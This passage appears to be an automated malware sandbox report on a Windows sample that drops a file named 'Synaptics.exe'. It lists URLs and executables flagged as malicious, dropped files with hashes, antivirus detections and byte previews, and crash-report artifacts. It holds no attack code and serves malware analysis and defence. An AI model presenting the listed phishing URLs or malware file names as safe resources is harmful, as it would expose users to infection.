                                                                                                                                                                                    https://markair.exavault.com/share/view/30569-33rfx9c2Get hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://www.canva.com/design/DAFA3lB4SXE/DLQIATPCZjJjZKyHIpDheQ/view?utm_content=DAFA3lB4SXE&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://www.canva.com/design/DAFA3lB4SXE/DLQIATPCZjJjZKyHIpDheQ/view?utm_content=DAFA3lB4SXE&utm_campaign=designshare&utm_medium=link&utm_source=publishsharelinkGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://socialmedia-insights.bloemlight.com/XZFZab1VrSm5XazB6Y0Vkc1ZIcFNTR1FyTTNoaVdqRnRhMDF0YVVodU4yUk1ZbU5FUTBoYVNrZFNUMnBVZUU5TU4zSTBjVnBQV1RsbldqUlNiRmN2YURSbVJsRnJjbmRpVDNsVVNrOUVhVXB6V0VsdlNIRlBjeTlhVTJGaFN6VmpWRmRXZGs1dlFUQmlPVVJIWTNWWE5HUTRPSGxuTTFOalFrMUthVEpLYkZKWk5sWlRhMDlDZFVjM2VIaDViWFFyVEZad04ybDJSa1o0ZVU1NFYyTjZiR3Q1YzJOaVZreDNNSEZ6UFMwdGJUaGpRamxZVjFoQ2NuaG9SRFEzWkVSSllUUkxVVDA5LS00MjRkZjk0YmQzMTM3ODliNGZlZjJlYmYwNWNhOWVkOTUzOWFjMzYw?cid=1157492589Get hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    VkDJ.exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    1920x1200 Funny Halloween Background__ (3).exeGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://www.evernote.com/shard/s577/sh/cde7bbf7-0fe0-f607-91ec-55818eac1d7a/48ac57e9f9d0c1cad815b286df1fdc4cGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://ice-us-sfo-57081.icedrive.io/download?p=O_HY5fp.ZLf67wk9g83euImDZLXme0m8hfdAJp43vNmHKMCVA5f0QoH_sviz3AsljvTYktcVEglCMJk58gfeha77OclpZRwe_dDYZRk9lyDlsmARLJSN03mB4rTg5sQpSEtrYiUJvhrFQA7RoWRZaveo.AmWbA34gjAtytIw1y9NvnxM2EHs1sAj8NdIvpC.m_rP61ddCWpUAL3nXwKynDLFJCIybO68zMiz7Bb.6.s-Get hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://obgynresults.com/secure-file/stewart.htmlGet hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46
                                                                                                                                                                                    https://www.evernote.com/shard/s384/sh/f55fef2a-de99-c85f-71d5-6d4ac43556a7/7398ca306f39b62aebbedbfcdc46a804Get hashmaliciousBrowse
                                                                                                                                                                                    • 142.250.186.46

                                                                                                                                                                                    Dropped Files

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{5E55AF9C-DBB2-486f-91C7-C9168C19150A}.tmp\360P2SP.dllinstbeta.exeGet hashmaliciousBrowse
                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dllinstbeta.exeGet hashmaliciousBrowse

                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                        C:\Program Files (x86)\360\360Safe\{E325B15D-92E4-4191-99D5-86346D60840A}.tf

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\._cache_A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):38
                                                                                                                                                                                        Entropy (8bit):2.6830456645595966
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:lERisn:Jsn
                                                                                                                                                                                        MD5:C741F5776D7BCD6E4364060EB2F3A540
                                                                                                                                                                                        SHA1:566142697DE6CF3C6B64727DE8FA5F5D36C38A8C
                                                                                                                                                                                        SHA-256:7FD56C81B97D5FCB50EF296E816855823876CD14C3A15DE93D5A0FBB2EBD0A7A
                                                                                                                                                                                        SHA-512:64CD0A644F1B95C30A0BE223C546EE51465608B5EE02F11F33F30465CC4156093BAEB5B08CD1DA11E2317E3F24592144D466709C90F5EA6140E38E1F775F4DA8
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:{.E.3.2.5.B.1.5.D.-.9.2.E.4.-.4.1.9.1.

                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_329477536da39aa93398cab5155185912f_455b7b6e_14fccb48\Report.wer

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                                        Entropy (8bit):1.124176313679274
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:M+doVpszmFHBUZMX/DzJDzqjut6aLACOY/u7s/S274ItdKDzy:jIymBUZMX/Jqj5U/u7s/X4Itoy
                                                                                                                                                                                        MD5:1DF8DE8FBCC9CCB7DA0E2B247C1D3C66
                                                                                                                                                                                        SHA1:7ACB33574C0046C210D28BDA03D8090BA518DCBD
                                                                                                                                                                                        SHA-256:3295F4C9C1D84669BAAB17A23260C095B827D2569DD28FF9CDDE3C726A329B15
                                                                                                                                                                                        SHA-512:B169727D0C46FE1EC59F92B605AB822BACC42ED7018CBFDF2D272AD960382B734EE647ADC3604675AE2663A480577338D62DBE9593B45B3E6D3A425EF2ACE10C
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.7.2.9.3.1.2.9.4.2.3.2.3.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.7.2.9.3.1.6.9.5.1.6.8.5.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.5.1.8.3.a.5.-.8.c.b.b.-.4.2.2.7.-.9.7.d.7.-.3.5.2.c.c.2.a.6.5.b.9.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.e.6.4.a.9.3.-.2.b.b.c.-.4.b.8.7.-.9.f.2.f.-.7.f.9.0.1.a.4.9.3.c.a.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.6.c.-.0.0.0.1.-.0.0.1.d.-.9.f.7.d.-.c.7.0.d.2.d.6.a.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.3.b.3.3.c.5.f.5.9.3.b.a.c.a.e.9.c.7.9.0.e.2.b.a.9.c.e.0.1.1.a.e.c.9.c.b.7.b.9.6.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER299A.tmp.dmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:Mini DuMP crash report, 15 streams, Tue May 17 20:32:13 2022, 0x1205a4 type
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):3391800
                                                                                                                                                                                        Entropy (8bit):2.1778425872627745
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:6144:Go2MT7lixSi+9/rsF0bpYJs+H1CD7ryvrGVA7FhviVnYAVktUYxiQIo9BE:h9iIbq0dnr+Gwun/VktUYxi
                                                                                                                                                                                        MD5:02405649420AF6B68B32B1332DAE41B9
                                                                                                                                                                                        SHA1:406A70F6A30EBCAF2FC22DFCC0E25D64479939BB
                                                                                                                                                                                        SHA-256:56AFAFB928A292904B1DA56161D480A2DE4274DE9CEFC11A3812C134C2771471
                                                                                                                                                                                        SHA-512:2850FD2C93C02AFD42ED999E14C9FC9DFA9A81BCABA26C84B556394AC6B550388AE4FDF54CE999FDE961DD641A9069EA206F9C6568C325125F83D51137C134DE
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:MDMP....... .......M..b............dK..........<...xR......$....q.....................`.......8...........T...........8.....1..........q...........s...................................................................U...........B......\t......GenuineIntelW...........T.......l......b.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERB3D9.tmp.WERInternalMetadata.xml

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):6304
                                                                                                                                                                                        Entropy (8bit):3.7220736222124526
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:Rrl7r3GLNiKxd6xYkRYiSSSECprT89bYPsfCIm:RrlsNiw6xYkRY6SIY0fs
                                                                                                                                                                                        MD5:DFC723DBFDDA7845014279427A36B7F1
                                                                                                                                                                                        SHA1:28B6C0FD25D348CA29AF4375672B07CC8B59851D
                                                                                                                                                                                        SHA-256:FE6AB48D88493D00CF746685801888731CAFE990976115743DF0CFBEE04E44F8
                                                                                                                                                                                        SHA-512:3DBECFCD7BABDF24285175D1EEEA4F20E5A05D2B813FAFD408CD80CC5FADAA1E79D68B6082A508224DCD3B2D0AF67A11559222F5F8908DC214A4905E1819AE28
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.0.8.<./.P.i.d.>.......

                                                                                                                                                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBD9.tmp.xml

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4556
                                                                                                                                                                                        Entropy (8bit):4.440299716012232
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:cvIwSD8zsT4JgtWI9fPWgc8sqYjzs8fm8M4JFBaFzX+q84tDnZkd:uITfT+EegrsqYXRJULnZkd
                                                                                                                                                                                        MD5:4A24635B89E5787427982C44D1A1BE0B
                                                                                                                                                                                        SHA1:AF485DDB4AC04CB056E86700BC2CEF8232E046F0
                                                                                                                                                                                        SHA-256:5EB17BB58E5A62E199243382C5D78A469EDA6445895F0BF9E0DCBD7422AB2219
                                                                                                                                                                                        SHA-512:9AF6FD3DB166DA743B67BA9DCC7A9B8E5E293EEADAF7099983C94F2FF1C739A86E14AF1F7A8ADA49BE7D43506581E28BCC3FD20C9B762907A35C97E9E836303A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1519543" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                                                                                                                                                        C:\ProgramData\Synaptics\RCX4F28.tmp

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:modified
                                                                                                                                                                                        Size (bytes):771584
                                                                                                                                                                                        Entropy (8bit):6.636337265724821
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IOr:ansJ39LyjbJkQFMhmC+6GD9p
                                                                                                                                                                                        MD5:589E0853896F9B8A51BAD44FD736043E
                                                                                                                                                                                        SHA1:3B33C5F593BACAE9C790E2BA9CE011AEC9CB7B96
                                                                                                                                                                                        SHA-256:4AA035A61476710EAB31F09CDFA6C23D24FE6B8EB36CD7A71DB05B0FE3B1202A
                                                                                                                                                                                        SHA-512:177074AE79E177DE28DBA04C255499E496A054FFC794AF8270D11E04F5F1EF73D000F90DBCB531430BC384A315AAF0C278B2AA91CFD016B011EF0E6A88CB044C
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4F28.tmp, Author: Joe Security
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 90%
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\Synaptics\Synaptics.exe

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):4148224
                                                                                                                                                                                        Entropy (8bit):7.53313781981056
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:98304:Xnsmtk2az3SGxXS4mA4R4FL8VH/hTFnJtJE6DfHrazkgEy:XLnGVlmv4yVH/XJvlDfLat
                                                                                                                                                                                        MD5:6A23EB71A9D38BB41D260439E66B9089
                                                                                                                                                                                        SHA1:8FB7E071F7176A17DAFADF82BE9FD8F69A327729
                                                                                                                                                                                        SHA-256:B634A8041412C63C42BBC10264B4C70B6A84D8AEB01A7D75D89731BB551835AC
                                                                                                                                                                                        SHA-512:195CE37BD24541F6584D23D48D2A79E4AB157F78F4C947F006AA2566E3A8A0351319E3CB1788EBA79932D21A526035B6F1BA4943A6ABC3A4BFF66FE8D3691532
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 88%
                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*......................5...................@...........................?..................@..............................B*......p.4..................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...p.4.......4.................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                        C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Users\user\Desktop\A1FsbRkm5m.exe
                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D8229FDA-A0BC-43AA-A7D6-EB27717D4CB0

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                        File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):146650
                                                                                                                                                                                        Entropy (8bit):5.360640050602017
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:1536:CcQI/gxgB5B3guw//Q9DQW+z3Wk4F77nXmvidZXxFETLKz6e:QHQ9DQW+zeXoI
                                                                                                                                                                                        MD5:FF6454F5F671591ABB726B46166EBBE8
                                                                                                                                                                                        SHA1:26E4AFCFFC851B8CF46C4CFBD6D518683F6DC67B
                                                                                                                                                                                        SHA-256:989242E99049817EF7E0F11704730387F2D5C49AF3ECAF3371D9B7372B3DEA5E
                                                                                                                                                                                        SHA-512:0306FEF8C1857CFD4A54825103D44F7DC4ACA88323BFE51C83E40E05038B2CFE0BE577522ACD6C95B9858CBA0349E7A18C32E58D90CC2B97648B4151FC0780FD
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-05-17T11:31:20">.. Build: 16.0.15309.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\16Mj19v.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.242273843124469
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0sSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+T+pAZewRDK4mW
                                                                                                                                                                                        MD5:DDED926D0715EC1519DDFCD1ED1CF2F0
                                                                                                                                                                                        SHA1:0FA1CF0BB9241C988DCFDFA4265715C61486B8CE
                                                                                                                                                                                        SHA-256:3B3A21F3963B326CE1CBF07756F28B8DF27DFA498FC211409664D8DED825D402
                                                                                                                                                                                        SHA-512:7A202C20559603154448966B7A1A01F7FBBF4541E095E35BCC7B28D15D8A7205183E8D1849325496977AA5AAE4235E7930397EAF4AAA957C5C749AF05DAD0FB6
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ot52rQKi2ccnlu4+0sV4hQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1B8AOeO.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.26897606803704
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0hDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+K+pAZewRDK4mW
                                                                                                                                                                                        MD5:00E8933C68C53D03F2C9BE02A40CFBAE
                                                                                                                                                                                        SHA1:F010B82BA7E43427557BEE41CF4D1E9B5F0CFD7E
                                                                                                                                                                                        SHA-256:9EE365EE68A22A88B53A45B6D8EEB7645703B29BE6722020173BC9AE45FB2A36
                                                                                                                                                                                        SHA-512:DAEB17319EA590046DBAA7D4B8D22BDD5B3E96297B6B3D194459AAEFC4ED82DD54F54757B9D89662C992EBE7C79E6C9E3A0783528AD10A01C271828DD3E4932B
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="9zbjLMw+1z2SZy062Ej1rQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\1B9CHgU.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.263140179773437
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:bsF+0fpLzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:bK+sLz+pAZewRDK4mW
                                                                                                                                                                                        MD5:EF710C6E86D0EF06E266062699F53FC9
                                                                                                                                                                                        SHA1:5FD806AA2174AB254E97A3EDA56D35742DAA9359
                                                                                                                                                                                        SHA-256:4A7287AE5BEEEDDD7D81BAE59F11E5F69E55198025FE3045553446956A3A2BE6
                                                                                                                                                                                        SHA-512:134B6016DFD901B3CEE2D7AC8EB0B1030909A302F9534EDDF7BF15F0C8DD182AC41A5BFFEC3A8AE868F378D86C005ED77BBC902F5FFFBDD89CBF1E089BC55962
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Dxh3LWwvQQoLP1yxKQdJgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) n

                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\2ixqlN1.ini

                                                                                                                                                                                        Download File
                                                                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):1642
                                                                                                                                                                                        Entropy (8bit):5.250640706774321
                                                                                                                                                                                        Encrypted:false
